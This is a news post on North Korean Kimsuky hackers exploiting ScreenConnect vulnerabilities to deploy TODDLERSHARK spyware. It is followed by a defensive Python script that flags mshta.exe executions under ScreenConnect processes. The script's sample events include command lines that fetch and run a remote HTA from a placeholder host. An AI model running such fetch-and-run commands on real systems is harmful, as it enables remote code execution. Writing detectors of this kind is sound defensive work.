North Koreans hack ScreenConnect servers with a small malicious shark

Teacher
TODDLERSHARK and CVE-2024-1708: the perfect combo for a cyber spy.

North Korean hackers used recently discovered vulnerabilities in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

According to a report from Kroll, TODDLERSHARK has similar features to well-known Kimsuky malware such as BabyShark and ReconShark.

"Attackers gained access to victims' workstations by exploiting a vulnerability in the ScreenConnect application setup wizard," report information security researchers Keith Wojcieszek, George Glass, and Dave Truman. "They then used the access they gained to execute mshta.exe with the URL of malware written in Visual Basic."

We are talking about the ConnectWise vulnerabilities CVE-2024-1708 and CVE-2024-1709, which became known at the end of February. Since then, they have been actively exploited by various groups to deliver cryptocurrency miners, ransomware, remote access software, and infostealers.

The Kimsuky group, also known as APT43, is constantly expanding its arsenal of malware, the latest of which are GoBear and Troll Stealer. BabyShark, discovered at the end of 2018, is launched using an HTML application. Once inside the system, it steals system information, remains present, and waits for further instructions from the operator.

In May 2023, a variant of BabyShark called ReconShark was spotted spreading through phishing emails. TODDLERSHARK is considered the newest evolution of this malware because of the similarity of code and tactics.

Basically, this software is designed to steal confidential data from compromised systems, acting as a cyber espionage tool.

The developers warn that TODDLERSHARK "exhibits elements of polymorphic behavior, which may make it difficult to detect in some environments."

Meanwhile, South Korea's National Intelligence Service accused North Korea of compromising the servers of two domestic semiconductor manufacturers and stealing valuable data in December 2023 and February 2024. It is suggested that North Korea may be preparing for its own production of semiconductors due to procurement difficulties caused by sanctions and the growing demand for them for weapons development.
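The post-exploitation step described above (mshta.exe launched with a remote URL after the ScreenConnect compromise) is the kind of behaviour a defender can hunt for in process-creation telemetry. The following is an added example, not code from the post or from Kroll: it scans constructed process-creation events in a hypothetical `parent|image|command_line` layout and rates each mshta.exe execution by whether it fetches a remote URL and whether its parent is a ScreenConnect process. The sample events and the `example.invalid` hostname are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample process-creation events (not taken from the Kroll report).
# Hypothetical layout: parent_image|image|command_line
SAMPLE_EVENTS = [
    "ScreenConnect.WindowsClient.exe|C:\\Windows\\System32\\cmd.exe|"
    "cmd.exe /c mshta.exe http://example.invalid/payload.hta",
    "explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe C:\\Users\\alice\\tool.hta",
    "ScreenConnect.ClientService.exe|C:\\Windows\\System32\\mshta.exe|"
    "mshta.exe https://example.invalid/x",
    "explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe notes.txt",
]

# mshta invoked as a bare name or at the end of a path, with or without ".exe"
MSHTA_RE = re.compile(r"(?:^|[\\\s])mshta(?:\.exe)?(?:\s|$)", re.IGNORECASE)
# any http/https URL in the command line means the HTA is fetched remotely
REMOTE_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str  # "high", "medium" or "low"
    reason: str
    command_line: str


def parse_event(line: str) -> Optional[Tuple[str, str, str]]:
    """Split one event into (parent, image, command_line); None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    parent, image, cmdline = (p.strip() for p in parts)
    return parent, image, cmdline


def classify(parent: str, image: str, cmdline: str) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for an mshta execution, or None if not mshta."""
    uses_mshta = bool(MSHTA_RE.search(cmdline)) or image.lower().endswith("\\mshta.exe")
    if not uses_mshta:
        return None
    remote = REMOTE_URL_RE.search(cmdline) is not None
    from_screenconnect = parent.lower().startswith("screenconnect")
    if remote and from_screenconnect:
        return "high", "mshta fetching remote HTA, spawned under a ScreenConnect process"
    if remote:
        return "medium", "mshta fetching remote HTA"
    if from_screenconnect:
        return "medium", "mshta spawned under a ScreenConnect process"
    return "low", "local mshta execution (review the HTA file)"


def scan(events: List[str]) -> List[Finding]:
    """Run the classifier over every event and collect findings."""
    findings: List[Finding] = []
    for n, line in enumerate(events, start=1):
        parsed = parse_event(line)
        if parsed is None:
            continue  # skip malformed telemetry rather than crash the scan
        verdict = classify(*parsed)
        if verdict is not None:
            findings.append(Finding(n, verdict[0], verdict[1], parsed[2]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] event {f.line_no}: {f.reason} :: {f.command_line}")
```

The parent-process check is what separates this from a generic mshta rule: mshta.exe with a remote URL is suspicious on its own, but the same thing spawned under a ScreenConnect process on a server that was still unpatched for CVE-2024-1708/1709 matches the chain Kroll describes and deserves the highest priority.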